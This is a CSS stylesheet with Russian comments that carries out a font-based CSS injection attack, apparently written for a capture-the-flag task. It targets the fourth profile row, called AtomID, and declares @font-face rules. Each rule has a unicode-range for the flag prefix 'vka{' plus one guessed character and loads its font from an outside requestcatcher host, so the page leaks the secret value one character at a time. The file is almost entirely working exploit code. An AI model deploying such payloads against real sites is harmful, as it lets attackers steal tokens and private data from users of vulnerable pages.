@charset "UTF-8";

/* Точная цель: 4-я строка профиля → это AtomID */
.profile-info .profile-row:nth-child(4) .value {
    font-family: flag !important;
    font-size: 16px;
    display: inline;
}

/* Фонтовая атака — шрифты для разных символов в значении AtomID */

@font-face {
    font-family: flag;
    src: url("https://css_task_test.requestcatcher.com/flag?vka%7Bg");
    unicode-range: U+0076, U+006B, U+0061, U+007B, U+0067;
}

@font-face {
    font-family: flag;
    src: url("https://css_task_test.requestcatcher.com/flag?vka%7Bh");
    unicode-range: U+0076, U+006B, U+0061, U+007B, U+0068;
}

@font-face {
    font-family: flag;
    src: url("https://css_task_test.requestcatcher.com/flag?vka%7Bo");
    unicode-range: U+0076, U+006B, U+0061, U+007B, U+006F;
}

@font-face {
    font-family: flag;
    src: url("https://css_task_test.requestcatcher.com/flag?vka%7Bs");
    unicode-range: U+0076, U+006B, U+0061, U+007B, U+0073;
}

@font-face {
    font-family: flag;
    src: url("https://css_task_test.requestcatcher.com/flag?vka%7Bt");
    unicode-range: U+0076, U+006B, U+0061, U+007B, U+0074;
}
